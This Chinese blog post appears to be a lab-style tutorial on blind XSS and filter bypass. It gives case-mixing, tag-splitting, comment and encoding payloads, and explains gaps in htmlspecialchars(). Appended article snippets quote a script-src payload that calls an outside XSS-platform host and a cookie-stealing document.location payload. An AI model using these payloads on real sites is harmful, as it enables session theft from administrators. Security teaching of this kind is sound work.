XSS盲打、绕过

最新推荐文章于 2024-10-02 15:27:16 发布
最新推荐文章于 2024-10-02 15:27:16 发布
阅读量3.5k 收藏 8
点赞数
分类专栏: 安全 XSS 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43716322/article/details/89480895
版权
安全 同时被 2 个专栏收录
18 篇文章 0 订阅
订阅专栏
XSS
3 篇文章 0 订阅
订阅专栏

#0x00:XSS盲打

尽可能地于一切可能的地方提交XSS语句,只要后台管理员看到某一条语句,此语句就能被执行。
可以再留言板上留下获取cookie的代码,只要管理员在后台看到,就能获取管理员的cookie。

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

#0x01:XSS绕过
通常有以下几种方法

0.前端限制——抓包重放/直接F12修改前端代码
1.大小写——<SCriPt>AleRt(test)</ScRipt>
2.拼凑法——<scri<script>pt>alert(test)</scr<srcript>ipt>
3.注释干扰法——<scri<!--test-->pt>alert(test)</scr<!--test-->ipt>
4.编码法——对Payload进行HTML编码

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

htmlspecialchars()函数

htmlspecialchars(string,flags,character-set,double_encode)

ENT_COMPAT - 仅编码双引号(默认)。
ENT_QUOTES - 编码双引号和单引号。
ENT_NOQUOTES - 不编码任何引号。

ps:$test = htmlspecialchars($name, ENT_QUOTES);

htmlspecialchars()函数默认只编码双引号,当开发者未对单引号过滤时,就会可能导致XSS的发生

在这里插入图片描述

在这里插入图片描述

js绕过

#herf输出

当输出在a标签里的href属性时,可以用js协议来执行js代码

在这里插入图片描述

在这里插入图片描述
#js输出

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

Anonymous0xcc
关注
专栏目录
某次日常xss
召唤大白的博客
03-09 331
今天接到个渗透测试的活,基本上就是静态站,本来也不报啥希望了,扫了一圈整个站就一个留言功能,根据经验一般留言就是在标签里,所以右键查看下元素,确定留言内容确实在里面,随手一个xss打未拦截,成功提交留言。 打使用的xss平台的默认模块Payload: ccc”</tExtArEa><sCRiPt sRC=https://xss8.cc/CnQ6></sCrIpT><textarea> 快下班时意外收到了弹回来的cookie,并且定位到了该站后台地址如下图,
XSS打演示和讲解;XSS过思路讲解和案例演示;XSS过关于htmlspecialchars()函数;XSS常见防范措施
qq_44696653的博客
05-04 936
XSS打演示和讲解 当只有后台会看到前端输入的内容而前端无法判断是否存在XSS时,我们可以插入XSS代码。这个时候由于后端的安全考虑往往不会很严格,所以当管理员登陆的时候就会被X。 在pikachu上具体的实验演示; 1.在XSS打模块根据前端的提示输入相关信息,发现输入的信息只会反馈给后台,在前端无法显示。这里就可以不管别的直接输入跨站脚本的内容 例如:<script>alert...
XSS
Naive_boy00的博客
10-15 2647
XSS的查找:过过滤机制,利用服务端错误的编码方式例:url:http//www.foo.com/xss.php?id=1HTML标签之间<div>[输出]</div> //xsspayload:<script>alert(1)</script>标签之间无法执行脚本,要先闭合掉对应的标签。此类标签有:<title></title> <textarea></textarea> <xmp></xmp>
【CTF Web】Pikachu xss打 Writeup(存储型XSS+目录扫描+暴力破解+XSS打)
最新发布
HEX9CF的技术博客
10-02 743
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:1.反射性XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
什么是xss
weixin_34334744的博客
10-26 116
什么是xss打?         打仅仅是一种惯称的说法,就是不知道后台不知道有没有xss存在的情况下,不顾一切的输入xss代码在留言啊,feedback啊之类的地方,尽可能多的尝试xss的语句与语句的存在方式,就叫打。        “xss打”是指在攻击者对数据提交后展现的后台未知的情况下,站点採用了攻击者插入了带真实攻击功能的xss攻击代码(一般是使用script标签引入...
XSS打基本概念
Fizz`s Blog
04-02 834
感觉XSS打属于比较无赖的。。。做不好自己的伪装还可能被定位。简单来说,打就是在一切可能的地方尽可能多的提交xss语句,然后看哪一条会被执行,就能获取管理员的cooike。趁着没过期赶紧用了,这样就能直接管理员进后台。然后再上传一句话,大马最终渗透进内网。这种属于没什么技术含量,甚至可以脚本自动化完成的事情。Web安全的低门槛和入门时的高成就感着实吸引了不少人。...
xss过html实体化,通过脚本片段XSS防御
weixin_42386511的博客
06-07 1767
原标题:通过脚本片段XSS防御 从恶作剧弹框到打后台乃至沦陷一个企业,XSS的危害可大可小,近年来,XSS攻击与防御的博弈持续不断,下面是今年5月份北爱尔兰首府举行的OWASP AppSec EU的安全议题:通过脚本片段XSS防御。一、XSS 防御措施尽管业界付出了很多努力,XSS依然是一个广泛且未解决的问题。有数据指出:谷歌VRP中70%的漏洞是XSS漏洞。XSS防御技术的通用假设为:...
xss 输出进行html编码,Pikachu:XSS-打、过滤、htmlspecialchars、href与js输出
weixin_31530761的博客
06-28 641
XSS打:前端数据交互的地方,输入信息,输入后的结果不在前端显示,也就是只有后台能看到输入的内容,从前端无法判断是否存在XSS,这种情况下,我们直接往里面插入XSS代码,然后等待。我们先进入打的页面:然后在上面的文本框植入script标签,你的大名的地方随便写就可以:alert('xss') / 123然后发现并没有弹窗,没有特别的事情发生:打开右上角的“点一下提示”,里面的内容提...
pikachu xss题解
L1ni01
07-25 395
XSS(跨站脚本)概述Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。 XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。 形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端.
XSS攻击:简单的打实验
weixin_43726152的博客
05-13 389
什么是打? 就是提交的恶意js给后台,但前端是看不见的,我们就不知道这里是否有漏洞。 比如意见箱: 但是值得试试,因为一旦管理员进入后台查看,就会中招 我们这里重复做获取管理员cookie这个实验,获取了管理员的cookie危害很大,攻击者可以用这个管理员cookie免密登入: 目标主机:win10 192.168.56.133 攻击主机:win10 192.168.56.132 构造payload <script>document.location = 'http://192.168.56
XSS漏洞---XSS
Ethan024的博客
03-13 307
XSS漏洞(本文仅供技术学习与分享) XSS打 实验准备: 皮卡丘靶场; 实验步骤: 输入无害字符串来查看效果,发现该字符串已经提交到后台; 输入一个JavaScript脚本 — alert(2222) 发现也并没有弹框 3. 登录管理员界面查看后台,发现登录就会弹框 4. 其本质就是XSS存储型漏洞。 ...
关于xss打关于xss
u012614598的专栏
11-21 1048
关于xss打关于xss打      又到了各种年终总结的时候了,先祝各位看官“圣诞快乐”。我记得有朋友问我在2012年里有没有“猥琐流”比较出彩的东西时,我给的答案是“xss打”!   关于“打”这个词语的出现,最早应该是在wooyun里id为“胯下有杀气”的马甲提出的。最早的一个wooyun案列是2012年7月提交的《WooYun-2012-09547》 ,由此xss打火了起来,
xss打以及打实验演示
qq_42764906的博客
04-23 427
输入 得到 输入 得到 理论上是输出到了管理者模式 进入该模式 账号admin 密码123456 得到
3-9xss打以及打实验演示
山兔的博客
04-27 1069
什么是XSS 打? xss打其实不是一种xss漏洞类型,他说的其实是一种攻击场景 也就是说只有后台会看到前端输入的内容。从前端无法判断是否存在XSS,怎么办? 不管3721,往里面插XSS代码,然后等待,可能会有惊喜! 由于是后端,可能安全考虑不太严格,当管理员登录时,就会被X! 我们切换到pikachu上面来,我们在输入框随便输入字符,看一下,他是怎么样的作用 仿佛在说,我们输入的内容,并不会在前端输出,看起来被提交到后台,也就是说,只有管理员,才有可能看到我们输入的内容,其它用户是看不到的,我们
xss打、过滤、htmlspecialchars、herf输出、js输出
weixin_51446936的博客
06-02 2034
一、XSS打 1.打概述 “xss打”是指在攻击者对数据提交后展现的后台未知的情况下,网站采用了攻击者插入了带真实攻击功能的xss攻击代码(通常是使用script标签引入远程的js)的数据。当未知后台在展现时没有对这些提交的数据进行过滤,那么后台管理人员在操作时就会触发xss来实现攻击者预定好的“真实攻击功能”。 也就是只有从后台才能看到前端输入的内容,从前端无法判断是否存在xss 2.实验演示 第一步:打开pikachu的xss打,随便输入信息 第二步:模拟后台管理员,登录后台进行查看(右上角
8.XSS
愿听风成曲
06-25 317
首先在xss打界面输入攻击代码和随意的大名提交即可。管理员界面直接会弹出xss界面。
Pikachu靶场:XSS
witwitwiter的博客
04-17 2175
Pikachu靶场:XSS打 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 ●xss打也是属于存储型XSS类型 打的意思是无法直接在前端看到反馈效果。 xss打类型交互的数据会被存在在数据库里面,永久性存储,一般出现在留言板,问卷调查等页面。 形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。存储型XSS漏洞跟反射型形成的原因一样,不同的是存储型XSS下攻击者可以
XSS跨站脚本攻击之——XSS
温柔小薛的博客
04-05 776
XSSXSS打就是攻击者在前端提交的数据不知道后台是否存在xss漏洞的情况下, 提交恶意JS代码在类似留言板等输入框后,所展现的后台位置的情况下, 网站采用了攻击者插入的恶意代码, 当后台管理员在操作时就会触发插入的恶意代码, 从而达到攻击者的目的。 方法 ‘’‘><script>alert('123')</script>+攻击代码 在文本框提交 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值